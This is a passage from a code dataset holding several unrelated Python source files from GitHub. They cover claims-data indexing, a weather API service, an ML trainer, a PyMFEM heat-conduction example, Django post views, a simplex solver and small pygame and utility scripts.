'SNFsecondaryPNEU/{}/'.format(year)\n )\n#\n\n## set BENE_ID as index for SNF claims\nfor year in years:\n for ctype in claims_type:\n df = dd.read_parquet(writePath + 'SNF{0}UTI/{1}/'.format(ctype, year))\n df_index = df.set_index('BENE_ID')\n df_index.to_parquet(writePath + 'SNF{0}UTI_indexed/{1}/'.format(ctype, year))\n\n\n\nfor year in years:\n for ctype in claims_type:\n df = dd.read_parquet(writePath + 'SNF{0}PNEU/{1}/'.format(ctype, year))\n df_index = df.set_index('BENE_ID')\n df_index.to_parquet(writePath + 'SNF{0}PNEU_indexed/{1}/'.format(ctype, year))\n","repo_name":"sanghavi-lab/nhc_infections","sub_path":"1_snf_infections.py","file_name":"1_snf_infections.py","file_ext":"py","file_size_in_byte":5278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11933443806","text":"from datetime import date\n\nfrom sqlalchemy import desc, func, select\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom exceptions import NoDataException\nfrom information.utils import get_avg_direction\nfrom station.models import point\n\n\nasync def get_date_avg_data(station_id: int, req_date: date, session: AsyncSession):\n points_query = select(point).where(point.c.station_id == station_id).filter(func.date(point.c.date) == req_date)\n points = await session.execute(points_query)\n points = points.all()\n points_count = len(points)\n\n if points_count == 0:\n raise NoDataException(\"No data\")\n\n temperature, wind_direction, wind_speed, air_humidity = 0, 0, 0, 0\n wind_directions = []\n\n for p in points:\n temperature += p[3]\n wind_directions.append(p[4])\n wind_speed += p[5]\n air_humidity += p[6]\n\n wind_direction = (get_avg_direction(wind_directions))\n\n return {\n \"avg_temperature\": temperature / points_count,\n \"avg_wind_direction\": wind_direction,\n \"avg_wind_speed\": wind_speed / points_count,\n \"avg_air_humidity\": air_humidity / points_count,\n }\n\n\nasync def get_last_station_point_data(station_id: int, session: AsyncSession):\n query = select(point).where(point.c.station_id == station_id).order_by(point.c.date.desc())\n points = await session.execute(query)\n points = points.first()\n return {\n \"temperature\": points[3],\n \"wind_directions\": points[4],\n \"wind_speed\": points[5],\n \"air_humidity\": points[6],\n }\n\n\n","repo_name":"lopachukseva/weather-station-api","sub_path":"src/information/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71967203027","text":"import logging.config\nfrom actuctic.start import Start\n\n\n# 配置日志文件和级别\nlogging.config.fileConfig('log_config.ini')\n\n# 测试没有进行设备连接的输入\ntry:\n app_start = Start()\n app_start.start_ui()\nexcept BaseException:\n logging.critical('no_device_start------start error')\n","repo_name":"fangchaooo/ActuaticUI-automation-Test","sub_path":"no_device_start.py","file_name":"no_device_start.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71760729105","text":"### You'll probably want to import some things, do that before funciton\r\n### definitions\r\n\r\n### function definitions at top!!!\r\n\r\nif __name__ == '__main__':\r\n\t### There's a FITS file with WCS information in this folder. Load the file and \r\n\t### make a plot, with axes in equatorial coodinates. Overlay a galactic \r\n\t### coordinate gird on the plot\r\n\r\n\r\n\t### Here's some names in a target list\r\n\ttgtnames = ['HD 189733', 'HD 209458', 'HD 149026', 'WASP-33', 'KELT-9', 'TOI-1518']\r\n\r\n\t### Write a function that takes a target Kmag and exposure time and \r\n\t### estimates the SNR of a Keck/NIRSPEC seeing-limited observation\r\n\t### in the Kband-new filter. Define your functions outside of main!! (why?)\r\n\r\n\t### Query Simbad for the Kband magnitudes of the listed targets.\r\n\t### Use your function to print the SNR in a 300s exposure for each target\r\n\r\n","repo_name":"lfinnerty/Astro142-SP23-Disc","sub_path":"Discussion12/discussion12_activity_template.py","file_name":"discussion12_activity_template.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"39733412746","text":"import numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data.sampler import BatchSampler, SubsetRandomSampler\n\nfrom sklearn.model_selection import train_test_split as tts\nfrom sklearn.metrics import confusion_matrix\n\nfrom sklearn.linear_model import LogisticRegression\n\nfrom model import Model\n\nclass Trainer:\n\n def __init__(self, feed_size, output_size, fc1_units, fc2_units, lr, checkpoint='./checkpoint.pth'):\n\n self.model = Model(feed_size, output_size, fc1_units, fc2_units)\n # self.optimizer = optim.Adam(self.model.parameters(), lr=lr)\n self.optimizer = optim.SGD(self.model.parameters(), lr=lr, momentum=0.9)\n\n self.checkpoint = checkpoint\n\n self.model.load(self.checkpoint)\n\n self.classifier = LogisticRegression(random_state=0)\n \n def train_with_logistic_regression(self, feed, target):\n # subsets \n train_feed, test_feed, train_target, test_target = tts(feed, target, test_size=0.1, random_state=0)\n\n print('Learning: Logistic Regression')\n\n self.classifier.fit(train_feed, train_target)\n\n print('\\nEnd')\n print('')\n\n self._test_with_logistic_regression(test_feed, test_target)\n \n def _test_with_logistic_regression(self, feed, target):\n print('Checking accuracy...')\n print('')\n\n test_predictions = self.classifier.predict(feed)\n\n test_target = target.astype(np.uint8)\n test_predictions = np.asarray( [ np.round(x) for x in test_predictions ] ) \n\n cm = confusion_matrix(test_target, test_predictions)\n\n diagonal_sum = cm.trace()\n all_elements = cm.sum()\n accuracy = diagonal_sum / all_elements\n print('Confusion matrix')\n print(cm)\n print('')\n print('Accuracy: {:.2f}'.format(accuracy))\n\n print('')\n print('End')\n \n \n def train_with_nn(self, feed, target, batch_size=512, epochs=1):\n\n # target = np.array( [ [0, 1] if t == 0 else [1, 0] for t in target ] )\n # subsets\n train_feed, test_feed, train_target, test_target = tts(feed, target, test_size=0.1, random_state=0)\n\n print('Learning: Neural Model') \n\n # criterion = nn.BCELoss()\n criterion = nn.CrossEntropyLoss()\n\n for epoch in range(epochs):\n batch = BatchSampler( SubsetRandomSampler( range(train_feed.shape[0]) ), batch_size, drop_last=False)\n\n batch_count = 0\n for batch_indices in batch:\n batch_indices = torch.tensor(batch_indices).long() \n batch_count += 1\n\n feeds = train_feed[batch_indices]\n targets = train_target[batch_indices].squeeze(1)\n\n # to tensor\n feeds = torch.tensor(feeds).float()\n # targets = torch.tensor(targets.astype(np.uint8)).float()\n targets = torch.tensor(targets).long()\n \n # forward\n predictions = self.model(feeds)\n\n # loss \n loss = criterion(predictions, targets)\n\n # Minimize the loss\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n print('\\rEpoch: \\t{} \\tBatch: \\t{} \\tLoss: \\t{:.8f}'.format(epoch+1, batch_count, loss.cpu().data.numpy()), end=\"\") \n \n print('\\nEnd')\n print('')\n\n self._test_with_nn(test_feed, test_target)\n\n # self.model.checkpoint(self.checkpoint)\n\n def _test_with_nn(self, feed, target, batch_size=512):\n\n print('Checking accuracy...')\n print('')\n\n batch = BatchSampler( SubsetRandomSampler( range(feed.shape[0]) ), batch_size, drop_last=False)\n\n test_predictions = []\n for batch_indices in batch:\n batch_indices = torch.tensor(batch_indices).long()\n\n feeds = feed[batch_indices]\n\n # to tensor\n feeds = torch.tensor(feeds).float() \n \n self.model.eval()\n with torch.no_grad():\n predictions = self.model(feeds).cpu().data.numpy()\n \n test_predictions.append( predictions )\n\n # for i in range( len(predictions) ):\n # print('Target: \\t{} \\t Predict: \\t{} {}'.format( target_set[i].squeeze(0), False if predictions[i] < 0.5 else True, predictions[i] )) \n\n\n test_target = target.astype(np.uint8)\n test_predictions = np.concatenate( test_predictions )\n test_predictions = np.asarray( [ np.argmax(x) for x in test_predictions ] ) \n\n cm = confusion_matrix(test_target, test_predictions)\n\n diagonal_sum = cm.trace()\n all_elements = cm.sum()\n accuracy = diagonal_sum / all_elements\n print('Confusion matrix')\n print(cm)\n print('')\n print('Accuracy: {:.2f}'.format(accuracy))\n\n print('')\n print('End')\n \n ","repo_name":"ibrahimth/Studies-and-Researches","sub_path":"ML Python/Exercise_Predition_2/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30686832602","text":"'''\n MFEM example 16\n\n How to run:\n python \n\n Example of arguments:\n ex16.py -m inline-tri.mesh\n ex16.py -m disc-nurbs.mesh -tf 2\n ex16.py -s 1 -a 0.0 -k 1.0\n ex16.py -s 2 -a 1.0 -k 0.0\n ex16.py -s 3 -a 0.5 -k 0.5 -o 4\n ex16.py -s 14 -dt 1.0e-4 -tf 4.0e-2 -vs 40\n ex16.py -m fichera-q2.mesh\n ex16.py -m escher.mesh\n ex16.py -m beam-tet.mesh -tf 10 -dt 0.1\n ex16.py -m amr-quad.mesh -o 4 -r 0\n ex16.py -m amr-hex.mesh -o 2 -r 0\n\n'''\nimport sys\nfrom mfem.common.arg_parser import ArgParser\nfrom os.path import expanduser, join, dirname\nimport numpy as np\nfrom mfem import path\n\nimport mfem.ser as mfem\nfrom mfem.ser import intArray\n\n\nclass ConductionOperator(mfem.PyTimeDependentOperator):\n def __init__(self, fespace, alpha, kappa, u):\n mfem.PyTimeDependentOperator.__init__(\n self, fespace.GetTrueVSize(), 0.0)\n rel_tol = 1e-8\n self.alpha = alpha\n self.kappa = kappa\n self.T = None\n self.K = None\n self.M = None\n self.fespace = fespace\n\n self.ess_tdof_list = intArray()\n self.Mmat = mfem.SparseMatrix()\n self.Kmat = mfem.SparseMatrix()\n self.M_solver = mfem.CGSolver()\n self.M_prec = mfem.DSmoother()\n self.T_solver = mfem.CGSolver()\n self.T_prec = mfem.DSmoother()\n self.z = mfem.Vector(self.Height())\n\n self.M = mfem.BilinearForm(fespace)\n self.M.AddDomainIntegrator(mfem.MassIntegrator())\n self.M.Assemble()\n self.M.FormSystemMatrix(self.ess_tdof_list, self.Mmat)\n\n self.M_solver.iterative_mode = False\n self.M_solver.SetRelTol(rel_tol)\n self.M_solver.SetAbsTol(0.0)\n self.M_solver.SetMaxIter(30)\n self.M_solver.SetPrintLevel(0)\n self.M_solver.SetPreconditioner(self.M_prec)\n self.M_solver.SetOperator(self.Mmat)\n\n self.T_solver.iterative_mode = False\n self.T_solver.SetRelTol(rel_tol)\n self.T_solver.SetAbsTol(0.0)\n self.T_solver.SetMaxIter(100)\n self.T_solver.SetPrintLevel(0)\n self.T_solver.SetPreconditioner(self.T_prec)\n\n self.SetParameters(u)\n\n def Mult(self, u, u_dt):\n # Compute:\n # du_dt = M^{-1}*-K(u) for du_dt\n self.Kmat.Mult(u, self.z)\n self.z.Neg() # z = -z\n self.M_solver.Mult(self.z, du_dt)\n\n def ImplicitSolve(self, dt, u, du_dt):\n # Solve the equation:\n # du_dt = M^{-1}*[-K(u + dt*du_dt)]\n # for du_dt\n if self.T is None:\n self.T = mfem.Add(1.0, self.Mmat, dt, self.Kmat)\n current_dt = dt\n self.T_solver.SetOperator(self.T)\n self.Kmat.Mult(u, self.z)\n self.z.Neg()\n self.T_solver.Mult(self.z, du_dt)\n\n def SetParameters(self, u):\n u_alpha_gf = mfem.GridFunction(self.fespace)\n u_alpha_gf.SetFromTrueDofs(u)\n for i in range(u_alpha_gf.Size()):\n u_alpha_gf[i] = self.kappa + self.alpha * u_alpha_gf[i]\n\n self.K = mfem.BilinearForm(self.fespace)\n u_coeff = mfem.GridFunctionCoefficient(u_alpha_gf)\n self.K.AddDomainIntegrator(mfem.DiffusionIntegrator(u_coeff))\n self.K.Assemble()\n self.K.FormSystemMatrix(self.ess_tdof_list, self.Kmat)\n self.T = None\n\n\nclass InitialTemperature(mfem.PyCoefficient):\n def EvalValue(self, x):\n xx = np.array(x)\n norm2 = np.sqrt(np.sum(xx**2))\n if norm2 < 0.5:\n return 2.0\n return 1.0\n\n\nparser = ArgParser(description='Ex16')\nparser.add_argument('-m', '--mesh',\n default='star.mesh',\n action='store', type=str,\n help='Mesh file to use.')\nparser.add_argument('-r', '--refine',\n action='store', default=2, type=int,\n help=\"Number of times to refine the mesh uniformly, -1 for auto.\")\nparser.add_argument('-o', '--order',\n action='store', default=2, type=int,\n help=\"Finite element order (polynomial degree)\")\nparser.add_argument('-s', '--ode-solver',\n action='store', default=3, type=int,\n help='\\n'.join([\"ODE solver: 1 - Backward Euler, 2 - SDIRK2, 3 - SDIRK3\",\n \"\\t\\t 11 - Forward Euler, 12 - RK2, 13 - RK3 SSP, 14 - RK4.\"]))\nparser.add_argument('-t', '--t-final',\n action='store', default=0.5, type=float,\n help=\"Final time; start time is 0.\")\nparser.add_argument(\"-dt\", \"--time-step\",\n action='store', default=0.01, type=float,\n help=\"Time step.\")\nparser.add_argument('-a', '--alpha',\n action='store', default=0.01, type=float,\n help='Alpha coefficient')\nparser.add_argument('-k', '--kappa',\n action='store', default=0.5, type=float,\n help='Kappa coefficient')\nparser.add_argument('-vis', '--visualization',\n action='store_true',\n help='Enable GLVis visualization')\nparser.add_argument('-vs', '--visualization-steps',\n action='store', default=5, type=int,\n help=\"Visualize every n-th timestep.\")\n\nargs = parser.parse_args()\nref_levels = args.refine\norder = args.order\ndt = args.time_step\nt_final = args.t_final\nalpha = args.alpha\nkappa = args.kappa\nvisualization = args.visualization\nvis_steps = args.visualization_steps\node_solver_type = args.ode_solver\nmeshfile = expanduser(\n join(dirname(__file__), '..', 'data', args.mesh))\nparser.print_options(args)\n\n# 2. Read the mesh from the given mesh file. We can handle triangular,\n# quadrilateral, tetrahedral and hexahedral meshes with the same code.\nmesh = mfem.Mesh(meshfile, 1, 1)\ndim = mesh.Dimension()\n\n# 3. Define the ODE solver used for time integration. Several implicit\n# singly diagonal implicit Runge-Kutta (SDIRK) methods, as well as\n# explicit Runge-Kutta methods are available.\nif ode_solver_type == 1:\n ode_solver = BackwardEulerSolver()\nelif ode_solver_type == 2:\n ode_solver = mfem.SDIRK23Solver(2)\nelif ode_solver_type == 3:\n ode_solver = mfem.SDIRK33Solver()\nelif ode_solver_type == 11:\n ode_solver = ForwardEulerSolver()\nelif ode_solver_type == 12:\n ode_solver = mfem.RK2Solver(0.5)\nelif ode_solver_type == 13:\n ode_solver = mfem.RK3SSPSolver()\nelif ode_solver_type == 14:\n ode_solver = mfem.RK4Solver()\nelif ode_solver_type == 22:\n ode_solver = mfem.ImplicitMidpointSolver()\nelif ode_solver_type == 23:\n ode_solver = mfem.SDIRK23Solver()\nelif ode_solver_type == 24:\n ode_solver = mfem.SDIRK34Solver()\nelse:\n print(\"Unknown ODE solver type: \" + str(ode_solver_type))\n exit\n# 4. Refine the mesh to increase the resolution. In this example we do\n# 'ref_levels' of uniform refinement, where 'ref_levels' is a\n# command-line parameter.\nfor lev in range(ref_levels):\n mesh.UniformRefinement()\n# 5. Define the vector finite element space representing the current and the\n# initial temperature, u_ref.\nfe_coll = mfem.H1_FECollection(order, dim)\nfespace = mfem.FiniteElementSpace(mesh, fe_coll)\nfe_size = fespace.GetTrueVSize()\nprint(\"Number of temperature unknowns: \" + str(fe_size))\nu_gf = mfem.GridFunction(fespace)\n\n# 6. Set the initial conditions for u. All boundaries are considered\n# natural.\nu_0 = InitialTemperature()\nu_gf.ProjectCoefficient(u_0)\nu = mfem.Vector()\nu_gf.GetTrueDofs(u)\n\n# 7. Initialize the conduction operator and the visualization.\noper = ConductionOperator(fespace, alpha, kappa, u)\nu_gf.SetFromTrueDofs(u)\n\nmesh.Print('ex16.mesh', 8)\nu_gf.Save('ex16-init.gf', 8)\n\nif visualization:\n sout = mfem.socketstream(\"localhost\", 19916)\n sout.precision(8)\n sout << \"solution\\n\" << mesh << u_gf\n sout << \"pause\\n\"\n sout.flush()\n print(\"GLVis visualization paused.\")\n print(\" Press space (in the GLVis window) to resume it.\")\n\n# 8. Perform time-integration (looping over the time iterations, ti, with a\n# time-step dt).\node_solver.Init(oper)\nt = 0.0\nti = 1\nlast_step = False\nwhile not last_step:\n if (t + dt >= t_final - dt/2):\n last_step = True\n\n t, dt = ode_solver.Step(u, t, dt)\n\n if (last_step or (ti % vis_steps) == 0):\n # if True:\n print(\"step \" + str(ti) + \", t = \" + \"{:g}\".format(t))\n u_gf.SetFromTrueDofs(u)\n if (visualization):\n sout << \"solution\\n\" << mesh << u_gf\n sout.flush()\n ti = ti + 1\n oper.SetParameters(u)\n\n# 9. Save the final solution. This output can be viewed later using GLVis:\n# \"glvis -m ex16.mesh -g ex16-final.gf\".\nu_gf.Save('ex16-final.gf', 8)\n","repo_name":"mfem/PyMFEM","sub_path":"examples/ex16.py","file_name":"ex16.py","file_ext":"py","file_size_in_byte":8679,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"48"} +{"seq_id":"42898813905","text":"#!/data/data/com.termux/files/usr/bin/env python3\n\nimport sys, os\n# ________________________________\n\n__author__ = 'Visto-Preto'\n__version__ = '1.0.0'\ndef platform():\n\tif sys.platform == 'linux':\n\t\tif os.path.isdir('/data/data/com.termux/files/usr/share/cde/'):\n\t\t\tpath_main = '/data/data/com.termux/files/usr/share/cde/'\n\t\t\tpath_db = '/data/data/com.termux/files/usr/share/cde/settings/'\n\t\telse:\n\t\t\tpath_main = '' \n\t\t\tpath_db = 'settings/'\n \n\t\tos_cls = 'clear' \n\t\tred = '\\033[1;31m' \n\t\tgreen = '\\033[1;32m' \n\t\tyellow = '\\033[1;33m' \n\t\tblue = '\\033[1;34m' \n\t\tmagenta = '\\033[1;35m' \n\t\tcyan = '\\033[1;36m' \n\t\treset = '\\033[m'\n\t\tdelete = 'rm -rf'\n\n\n\telif sys.platform == 'win32':\n\t\tpath_main = ''\n\t\tpath_db = 'settings\\\\'\n\t\tos_cls = 'cls' \n\t\tred = '' \n\t\tgreen = '' \n\t\tyellow = '' \n\t\tblue = '' \n\t\tmagenta = '' \n\t\tcyan = '' \n\t\treset = ''\n\t\tdelete = 'del /f'\n\treturn path_main, path_db, os_cls, red, green, yellow, blue, magenta, cyan, reset, delete\n","repo_name":"Visto-Preto/CaixaDeEconomias-GUI","sub_path":"module/platform.py","file_name":"platform.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1390427133","text":"from django.views.generic import ListView, DetailView, CreateView\nfrom django.views import View\nfrom .models import Dynamic, DynamicType\nfrom django.shortcuts import redirect, reverse\nfrom .forms import DynamicCreateForm\n\ndef paginator_handle(request, context):\n paginator = context['paginator']\n page_num = request.GET.get('page', 1)\n page_of_dynamics = paginator.get_page(page_num)\n current_page_num = page_of_dynamics.number\n page_range = list(range(max(current_page_num - 2, 1), current_page_num)) + \\\n list(range(current_page_num, min(current_page_num + 2, paginator.num_pages) + 1))\n\n if page_range[0] - 1 >= 2:\n page_range.insert(0, '...')\n if paginator.num_pages - page_range[-1] >= 2:\n page_range.append('...')\n if page_range[0] != 1:\n page_range.insert(0, 1)\n if page_range[-1] != paginator.num_pages:\n page_range.append(paginator.num_pages)\n context['page_range'] = page_range\n context['page_of_dynamics'] = page_of_dynamics\n return context\n\n\nclass DynamicsList(ListView):\n template_name = 'dynamic/dynamics_list.html'\n context_object_name = 'dynamic_list'\n paginate_by = 4\n allow_empty = True\n\n def get_queryset(self):\n return Dynamic.objects.filter(is_public=True, is_delete=False)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return paginator_handle(self.request, context)\n\n\nclass MyDynamicsList(ListView):\n template_name = 'dynamic/my_dynamics_list.html'\n context_object_name = 'dynamic_list'\n paginate_by = 4\n allow_empty = True\n\n def get_queryset(self):\n return Dynamic.objects.filter(owner=self.request.user, is_delete=False)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return paginator_handle(self.request, context)\n\n\nclass DynamicDetail(DetailView):\n template_name = 'dynamic/dynamic_detail.html'\n\n\nclass DynamicDelete(View):\n def get(self, request, *args, **kwargs):\n if request.user.is_authenticated:\n pk = request.GET.get('delete', 0)\n dynamic = Dynamic.objects.get(pk=pk)\n if request.user == dynamic.owner:\n dynamic.is_delete = True\n dynamic.save()\n return redirect(request.GET.get('from', reverse('home')))\n else:\n return redirect(reverse('home'))\n\n\nclass DynamicCreate(CreateView):\n model = Dynamic\n template_name = 'dynamic/dynamic_create.html'\n form_class = DynamicCreateForm\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['dynamic_types'] = DynamicType.objects.values(\"type_name\").distinct()\n return context\n\n def form_valid(self, form):\n if self.request.user.is_authenticated:\n user = self.request.user\n type = self.request.POST.get('dynamic_type', '')\n text = form.cleaned_data['text']\n is_public = self.request.POST.get('is_public', '')\n\n dynamic = Dynamic()\n dynamic.owner = user\n dynamic.type = DynamicType.objects.filter(type_name=type).first()\n dynamic.text = text\n dynamic.is_public = True if is_public == 'True' else False\n dynamic.save()\n\n # 判断有没有多重next\n if '?next=' not in self.request.GET.get('next', ''):\n return redirect(self.request.GET.get('next', reverse('home')))\n else:\n return redirect(reverse('home'))\n","repo_name":"caoxunaaa/TreeHole","sub_path":"dynamic/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2073601194","text":"import numpy as numpy\n\n\ndef main():\n inf = open('C:/Users/Хэшэгто/Desktop/input.txt', 'r')\n coeffs = int(inf.readline().strip())\n inequalities = int(inf.readline().strip())\n print('Количество переменных: ', coeffs)\n print('Количество ограничений: ', inequalities)\n\n method = SymplexMethod()\n method.generateMatrix(coeffs, inequalities)\n\n line = inf.readline().strip()\n method.add_ObjectiveFunction(line, coeffs)\n\n for i in range(inequalities):\n line = inf.readline().strip()\n method.add_IneqFunctions(line, coeffs, i)\n inf.close()\n\n print(method.table)\n while method.iter == 0:\n method.check_Optimality(coeffs)\n for i in range(inequalities + 1):\n print(method.table[i][-1])\n\n\nclass SymplexMethod:\n iter = 0\n def generateMatrix(self, variables, constants):\n self.table = numpy.zeros((constants + 1, variables + constants + 1))\n self.signs = []\n\n def add_ObjectiveFunction(self, eq, co):\n s = eq.split()\n for i in range(co):\n self.table[0][i] = -int(s[i])\n\n def add_IneqFunctions(self, ineq, co, num):\n s = ineq.split()\n for i in range(co):\n self.table[num + 1][i] = s[i]\n self.table[num + 1][co + num] = 1\n self.table[num + 1][-1] = s[-1]\n self.signs += [s[-2]]\n\n def check_Optimality(self, co):\n min = [self.table[0][0], 0]\n for i in range(co):\n if self.table[0][i] < min[0] and self.table[0][i] < 0:\n min[0] = self.table[0][i]\n min[1] = i\n if min[0] >= 0:\n print('Текущее базисное решение оптима��ьно!')\n self.iter = 1\n else:\n self.LeadingColumn = min[1]\n self.check_InfSolutions()\n\n def check_InfSolutions(self):\n p = 1\n for i in range(1, len(self.table)):\n if self.table[i][self.LeadingColumn] > 0:\n p = 0\n else:\n print('Значение задачи ЛП не ограничено!')\n self.iter = 2\n if p != 1:\n min = [self.table[1][-1] / self.table[1][self.LeadingColumn], 1]\n for i in range(1, len(self.table)):\n if self.table[i][self.LeadingColumn] > 0:\n a = self.table[i][-1] / self.table[i][self.LeadingColumn]\n if min[0] > a:\n min[0] = a\n min[1] = i\n\n self.LeadingString = min[1]\n self.tableConversion()\n\n def tableConversion(self):\n n = len(self.table[0])\n m = len(self.table)\n table = numpy.zeros((m, n))\n a = self.table[self.LeadingString][self.LeadingColumn]\n for i in range(m):\n if i != self.LeadingString:\n for j in range(n-1):\n table[i][j] = self.table[i][j] - (self.table[self.LeadingString][j] / a * self.table[i][self.LeadingColumn])\n table[i][n-1] = self.table[i][n-1] - (self.table[self.LeadingString][n-1] / a * self.table[i][self.LeadingColumn])\n else:\n for j in range(n - 1):\n table[i][j] = self.table[i][j] / a\n table[i][n-1] = self.table[i][n-1] / a\n print(table)\n self.table = table\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"heshegto/Game-theory","sub_path":"Symplex.py","file_name":"Symplex.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22353903856","text":"#调用pygame包\nimport pygame\n#调用PYGAME模块\nfrom pygame.locals import *\n\n#创建一个飞机的类\nclass Hero(object):\n #定义一个实例方法,添加属性\n def __init__(self):\n # self.hero = pygame.image.load(\"./feiji/hero.gif\")\n self.x = 230\n self.y = 600\n self.image = pygame.image.load(\"./feiji/hero.gif\") \n\n #定义一个实例方法,导入图片\n def heroImage(self): \n return self.image\n\n #定义一个实例方法,接收图像,并且输入飞机位置\n def heroBlit(self):\n screen.blit(hero,(Herox,Heroy))\n\n#检测设置\nif __name__ == \"__main__\":\n\n #1. 创建一个窗口,用来显示内容\n screen = pygame.display.set_mode((480,600),0,32)\n\n #2. 创建一个和窗口大小的图片,用来充当背景\n background = pygame.image.load(\"./feiji/background.png\").convert()\n x=230\n y=450\n \n hero = Hero()\n #把背景图片放到窗口中显示\n while True:\n screen.blit(background,(0,0))\n screen.blit(hero.heroImage(),(x,y))\n #判断用户输入的键\n for event in pygame.event.get():\n if event.type == QUIT:\n print('exit')\n exit()\n elif event.type == KEYDOWN:\n if event.key == K_a or event.key == K_LEFT:\n x -= 20\n print('left')\n elif event.key == K_d or event.key == K_RIGHT:\n x += 20\n print('right')\n elif event.key == K_SPACE:\n print('space')\n pygame.display.update()\n\n\n\n\n\n\n\n","repo_name":"itcast-Github/python_base","sub_path":"08-类与对象/03-显示玩家飞机-面向过程2.py","file_name":"03-显示玩家飞机-面向过程2.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"43001832692","text":"from extract_unrelated420 import extract_sc, extract_fc_corr, extract_fc_prec\nfrom gen_coupling import gen_scfc_coupling\nfrom GLM import glm\nfrom extract_herit941 import extract_herit_sc, extract_herit_fc, gen_herit_scfc_couping, standardize\nimport scipy.io as sio\nimport numpy as np\nimport os\nimport scipy.stats as stats\n\ncwd = os.getcwd()\ndata_dir = cwd + '/data/'\n\nall_subj = np.genfromtxt(data_dir + 'subjects_all997.txt', dtype='int')\nunrelated_subj = np.genfromtxt(\n data_dir + 'subjects_unrelated420.txt', dtype='int')\n\nroi_number = 392\nopt_gamma = 0.3\n\ndef extract_data():\n extract_sc('sift2volnorm')\n extract_fc_corr('hpf')\n extract_fc_prec('hpf')\n\n\nextract_data()\ngen_scfc_coupling('sift2volnorm', 'prec', 'hpf')\ngen_scfc_coupling('sift2volnorm', 'corr', 'hpf')\nglm('prec', 'hpf')\nglm('corr', 'hpf')\nextract_herit_sc('sift2volnorm')\nextract_herit_fc(opt_gamma)\nstandardize('sc')\nfor fc_type in ['prec', 'corr']:\n\tfor sess in range(1,5):\n\t\tgen_herit_scfc_couping('sift2volnorm', fc_type, sess)\n\t\tstandardize('fc', fc_type, sess)\n\t\tstandardize('cp', fc_type, sess)\n\n","repo_name":"zijin-gu/scfc-coupling","sub_path":"source/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"10834990374","text":"from prob_4 import is_palindromic\n\nsum_rev = lambda n: n + int(str(n)[::-1])\n\ndef lychrel(n):\n n = sum_rev(n)\n count = 1\n while not is_palindromic(n):\n n = sum_rev(n)\n count += 1\n if count > 49:\n return True\n return False\n\nprint(sum([lychrel(n) for n in range(10000)]))\n","repo_name":"lordgrenville/project_euler","sub_path":"prob_55.py","file_name":"prob_55.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2982837193","text":"menus = {\n \"value\": {\n \"beef burger\": 5.69,\n \"fries\": 1.00,\n \"fizzy drink\": 1.00\n },\n \"cheezy\": {\n \"cheeseburger\": 6.69,\n \"fries\": 1.00,\n \"fizzy drink\": 1.00\n },\n \"super\": {\n \"cheeseburger\": 6.69,\n \"large fries\": 2.00,\n \"smoothie\": 2.00\n }\n}\nprint(menus)\n","repo_name":"ASDenne/burger-ordering","sub_path":"store menues.py","file_name":"store menues.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42453570479","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def maxPathSum(self, root: Optional[TreeNode]) -> int:\n self.candidates = []\n self.traverse(root)\n return max(self.candidates) if self.candidates else 0\n\n def traverse(self, node):\n if not node:\n return 0\n\n left = self.traverse(node.left)\n right = self.traverse(node.right)\n\n left_self = left + node.val\n right_self = right + node.val\n\n left_right_self = left + right + node.val\n ret_val = max(left_self, right_self, node.val)\n\n self.candidates.extend([ret_val, left_right_self])\n\n return ret_val\n","repo_name":"versenyi98/programming-contests","sub_path":"LeetCode/0124. Binary Tree Maximum Path Sum/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"28721701447","text":"def zerosAtTheEnd(lst:list) -> list: # the input is a list.\r\n for i in range(len(lst)): # the program iterates the lenght of the list.\r\n if lst[i] == 0: # if it founds a zero, it removes it from the position and adds it at the end.\r\n lst.pop(i)\r\n lst.append(0)\r\n return lst\r\n\r\nif __name__ == \"__main__\":\r\n n = int(input(\"Enter the number of real numbers the list will contain: \"))\r\n lst = [int(input(\"Enter a number: \")) for x in range(n)]\r\n res = zerosAtTheEnd(lst)\r\n 